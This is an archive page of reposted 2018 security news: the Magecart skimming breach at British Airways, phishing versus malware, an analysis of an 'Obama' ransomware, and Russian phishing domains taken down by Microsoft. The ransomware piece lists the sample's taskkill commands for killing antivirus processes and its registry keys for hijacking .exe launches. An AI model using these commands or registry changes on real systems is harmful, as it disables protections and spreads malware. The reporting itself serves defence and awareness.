Month: September 2018

HOW HACKERS SLIPPED BY BRITISH AIRWAYS’ DEFENSES

Posted on

ON FRIDAY, BRITISH Airways disclosed a data breach impacting customer information from roughly 380,000 booking transactions made between August 21 and September 5 of this year. The company said that names, addresses, email addresses, and sensitive payment card details were all compromised. Now, researchers from the threat detection firm RiskIQ have shed new light on how the attackers pulled off the heist.

RiskIQ published details tracking the British Airways hackers’ strategy on Tuesday, also linking the intrusion to a criminal hacking gang that has been active since 2015. The group, which RiskIQ calls Magecart, is known for web-based credit card skimming—finding websites that don’t secure payment data entry forms, and vacuuming up everything that gets submitted. But while Magecart has previously been known to use the same broadly targeted code to scoop up data from various third-party processors, RiskIQ found that the attack on British Airways was much more tailored to the company’s specific infrastructure.

“We’ve been tracking the Magecart actors for a long time and one of the developments in 2017 was … they started to invest time into targets to find ways to breach specific high-profile companies, like Ticketmaster,” says RiskIQ threat researcher Yonathan Klijnsma. “The British Airways attack we see as an extension of this campaign where they’ve set up specialized infrastructure mimicking the victim site.”

In its initial disclosure, British Airways said that the breach didn’t impact passport numbers or other travel data. But the company later clarified that the compromised data included payment card expiration dates and Card Verification Value codes—the extra three or four-digit numbers that authenticate a card—even though British Airways has said it does not store CVVs. British Airways further noted that the breach only impacted customers who completed transactions during a specific timeframe—22:58 BST on August 21 through 21:45 BST on September 5.

These details served as clues, leading analysts at RiskIQ and elsewhere to suspect that the British Airways hackers likely used a “cross-site scripting” attack, in which bad actors identify a poorly secured web page component and inject their own code into it to alter a victim site’s behavior. The attack doesn’t necessarily involve penetrating an organization’s network or servers, which would explain how hackers only accessed information submitted during a very specific timeframe, and compromised data that British Airways itself doesn’t store.

Klijnsma, who pinned the recent Ticketmaster breach on Magecart and saw similarities with the British Airways situation, started looking through RiskIQ’s catalog of public web data; the company crawls more than two billion pages per day. He identified all the unique scripts on the British Airways website, which would be targeted in a cross-site scripting attack, and then tracked them through time until he found one JavaScript component that had been modified right around the time the airline said the attack began.

‘The British Airways attack we see as an extension of this campaign where they’ve set up specialized infrastructure mimicking the victim site.’

YONATHAN KLIJNSMA, RISKIQ

The script is connected to the British Airways baggage claim information page; the last time it had been modified prior to the breach was December 2012. Klijnsma quickly noticed that attackers revised the component to include code—just 22 lines of it—often used in clandestine manipulations. The malicious code grabbed data that customers entered into a payment form, and sent it to an attacker-controlled server when a user clicked or tapped a submission button. The attackers even paid to set up a Secure Socket Layer certificate for their server, a credential that confirms a server has web encryption enabled to protect data in transit. Attackers of all sorts have increasingly used these certificates to help create an air of legitimacy—even though an encrypted site is not necessarily safe.

The airline also said in its disclosure that the attack impacted its mobile users. Klijnsma found a part of the British Airways Android app built off of the same code as the compromised portion of the airline’s website. It’s normal for an app’s functionality to be based in part on existing web infrastructure, but the practice can also create shared risk. In the case of the British Airways Android app, the malicious JavaScript component the attackers injected on the main site hit the mobile app as well. Attackers seem to have designed the script with this in mind by accommodating touchscreen inputs.

While the attack wasn’t elaborate, it was effective, because it was tailored to the specific scripting and data flow weaknesses of the British Airways site.

British Airways said in a statement to WIRED on Tuesday, “As this is a criminal investigation, we are unable to comment on speculation.”1 RiskIQ says it gave the findings to the UK’s National Crime Agency and National Cyber Security Centre, which are investigating the breach with British Airways. “We are working with partners to better understand this incident and how it has affected customers,” an NCSC spokesperson said of the breach on Friday.

RiskIQ says it is attributing the incident to Magecart because the skimmer code injected into the British Airways website is a modified version of the group’s hallmark script. RiskIQ also views the attack as an evolution of the techniques used in the recent Ticketmaster breach, which RiskIQ linked to Magecart, though with the added innovation of directly targeting a victim’s site rather than compromising a third party. And some of the attack infrastructure, like the web server hosting and domain name, point to the group as well.

So far British Airways and law enforcement haven’t publicly commented on this attribution, but Klijnsma says the other takeaway for now is the prevalence of tiny website vulnerabilities that can quickly turn into huge exposures.

“It comes down to knowing your web-facing assets,” Klijnsma says. “Don’t overexpose—only expose what you need. The consequences, as seen in this incident, can be really, really bad.”

Your Business Should Be More Afraid of Phishing than Malware

Posted on

Originally Seen: on Security boulevard by Graham Cluley on September 19, 2018

The headlines love to talk about sophisticated hacking gangs, exploiting zero-day vulnerabilities to break their way into businesses and steal corporate data.

It seems not a day goes past without a security firm warning about a new strain of ransomware, or how criminals are planting cryptomining code on poorly-protected IoT devices and insecure data centres.

And although these are real problems and shouldn’t be ignored, I would argue that there is another more down-to-earth threat that is more commonly encountered and has the potential to cause massive harm to your organisation.

If you were to make a list of the most common causes of security breaches, it is phishing attacks that would surely dominate.

A recent study of 100 UK-based CISOs confirms that phishing is a major concern, with nearly half of respondents blaming the phenomenon for the biggest security incidents they had suffered in the last 12 months.

The figures speak for themselves:

  • More than twice as many breaches were blamed on phishing rather than malware (48% compared to 22%)
  • In fact, even when malware was combined with unpatched systems (coming to a total of 41% of reports) it still failed to be as big of a problem as phishing.

A phishing attack is considerably easier for a criminal to orchestrate than the creation of a brand new piece of malware, and can be reused time and time again with often little or no need for change between victims.

For instance, if you were an online criminal and your intention was to break into the cloud service used by a corporation in order to steal their sensitive documents, you could use the same phishing template posing as the cloud service time and time again.

aws-phishing

Similarly, if your intention was to – say – break into an organisation’s email system and you knew that they used Office 365, you could simply construct an email that tricks the victim into clicking on a link that they believed would log them into their Office 365 account, but really was designed to steal their password.

office365-phishing-page

Most users will find it very hard to tell the difference between a fake login page and a real one.

And if your organisation is being specifically targeted by hackers, they may have gone to additional effort to make the webpage which aims to steal your login credentials even more sophisticated.

The browser’s URL bar is perhaps where the most obvious clues of trickery can be observed, but how many users can we really expect to carefully inspect the sometimes lengthy and complex URL?

It’s only human to click without thinking, to fail to spot where the URL was really pointing, to enter a password on auto-pilot without realising what you’ve just done.

I don’t believe that raising awareness amongst users of the tricks used by phishing pages, and to look for clues in the URL bar, is a waste of time – but we must recognise that if a person’s role is not security-focused, it’s unfair and unrealistic to assume that they will always have their guard up and be alert to potential threats.

A stronger defence, therefore, is to prevent as many suspicious emails as possible from entering your organisation in the first place, visibly warn users on-screen to take additional caution when an email originates from outside the business or if it contains keywords associated with phishing emails, enable multi-factor authentication wherever possible, and deploy a enterprise password management solution.

These last two points I believe are particularly important, as they put technology to work in helping reduce the chances of what is essentially a human problem.

More and more services now offer business users the option of enable multi-factor authentication or two-step verification.  The huge security benefit of turning on such features is that even if online criminals do manage to steal the username and password of an account, they will not be able to access it unless they also have the one-time-password (OTP) used for an additional layer of authentication.

Systems like this are not necessarily completely fool-proof, and a sophisticated and determined attack may be prepared to go to the additional efforts required to try to still crack into accounts – but there is no doubt that it is considerably more difficult for a data breach to occur if such additional levels of authentication are in place.

Don’t take my word for it, it was revealed a couple of months ago that not one of Google’s 85,000 employees had had their accounts compromised by phishing in the last year.   The reason? All staff gad been required to use physical security keys to authenticate their identity, rather than relying on passwords.

Google is setting a good example for other businesses here, but there is little evidence that enough other computer users are following in its footsteps.

Earlier this year, despite the alarming rise business email compromise and phishing attacks against organisations, Google reported that less than 10% of its customers have enabled two-step verification to harden their accounts from compromise.

Password managers also bring a big benefit in the fight against phishing.  That’s because, aside from their well-understood talent for storing strong passwords securely, password managers can also offer to enter a username and password when they recognise a login page.

In other words, if they *don’t* recognise a login page – perhaps because the potential victim’s browser has ended up on a bogus webpage with a lookalike but non-identical URL – the password manager will not offer to enter their credentials.

Phishing may not be the sexiest threat out there, but do not underestimate its seriousness – and the impact it could have on your organisation if not treated with respect.

Barack Obama’s Blackmail Virus Ransomware Only Encrypts .EXE Files

Posted on

Originally Seen: Bleepingcomputer.com on September 2, 2018 by Lawrence Abrams

Every once in a while you come across a really strange malware and such is the case with a new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a “tip” to decrypt the files.

Barack Obama's Everlasting Blue Blackmail Virus Ransomware
Barack Obama’s Everlasting Blue Blackmail Virus Ransomware

First tweeted by MalwareHunterTeam, this ransomware has the bizarre title of “Barack Obama’s Everlasting Blue Blackmail Virus” as shown by the file properties below.

File Properties
File Properties

When executed, this ransomware will terminate various processes associated with antivirus software such as Kaspersky, McAfee, and Rising Antivirus . The commands executed to kill the processes are:

taskkill /f /im kavsvc.exe
taskkill /f /im KVXP.kxp
taskkill /f /im Rav.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Mcshield.exe
taskkill /f /im VsTskMgr.exe

It will then scan the computer for .exe files and encrypt them. When encrypting files, it will target all .EXE files, even those that are located under the Windows folder. Other ransomware in the past that encrypted executables typically avoid the Windows folder so that it does not cause problems with the proper execution of the operating system.

Encrypted Executables
Encrypted Executables

As part of the encryption process, this ransomware will also modify the Registry keys associated with .exe files so that they use a new icon and run the virus every time someone launches an executable. The modified keys are listed below.

HKLM\SOFTWARE\Classes\exe
HKLM\SOFTWARE\Classes\exe\	
HKLM\SOFTWARE\Classes\exe\EditFlags	2
HKLM\SOFTWARE\Classes\exe\DefaultIcon
HKLM\SOFTWARE\Classes\exe\DefaultIcon\	C:\Users\User\codexgigas_.exe,0
HKLM\SOFTWARE\Classes\exe\Shell
HKLM\SOFTWARE\Classes\exe\Shell\Open
HKLM\SOFTWARE\Classes\exe\Shell\Open\Command
HKLM\SOFTWARE\Classes\exe\Shell\Open\Command\	"C:\Users\User\codexgigas_.exe" "%1"

The message in the ransomware interface states that users should contact the attacker at the 2200287831@qq.com for payment instructions.

Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.
So you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information.

It is unknown how this ransomware is distributed or if the developer will even provide a decryption key if paid.

Obama is not the only President to have had a ransomware created after him. Prior to the 2016 United Stated presidential election, the The Donald Trump Ransomware was released.

The Trump Ransomware was a development version that had built-in decryption.

Microsoft: Russians targeted conservative think tanks, U.S. Senate

Posted on

Originally Seen: Cybersecurity.com on August 21, 2018 by Sean Lyngaas

The Russian intelligence office that breached the Democratic National Committee in 2016 has spoofed websites associated with the U.S. Senate and conservative think tanks in a further attempt to sow discord, according to new research from Microsoft.

The tech giant last week executed a court order and shut down six internet domains set up by the Kremlin-linked hacking group known as Fancy Bear or APT 28, Microsoft President Brad Smith said.

“We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group,” Smith wrote in a blog post. “We’re concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections.”

The domains were constructed to look like they belonged to the Hudson Institute and International Republican Institute, but were in fact phishing websites meant to steal credentials.

The two think tanks are conservative, yet count many critics of U.S. President Donald Trump and Russian President Vladimir Putin among their members. The International Republican Institute lists Sen. John McCain, R-Ariz, and former Republican presidential candidate Mitt Romney as board members. The Hudson Institute and International Republican Institute also have programs that promote democracy and good governance worldwide.

There is no evidence that the domains had been used to carry out successful cyberattacks, according to Microsoft. The company says it continues to work with both think tanks and the U.S. Senate to guard against any further attacks.

The attacks come as more and more instances of cyberattacks directed at the 2018 midterm elections come to light. Last month, Russian intelligence targeted Sen. Claire McCaskill, a critic of Moscow and a red-state Democrat who faces a tough reelection bid in Missouri. Additionally, a number of election websites have been hit with DDoS attempts during their primary elections.

“We are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States,” Microsoft’s blog post read. “Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.”

Smith also announced that Microsoft was providing cybersecurity protection for candidates, campaigns and political institutions that use Office 365 at no additional cost.

Greg Otto contributed to this story.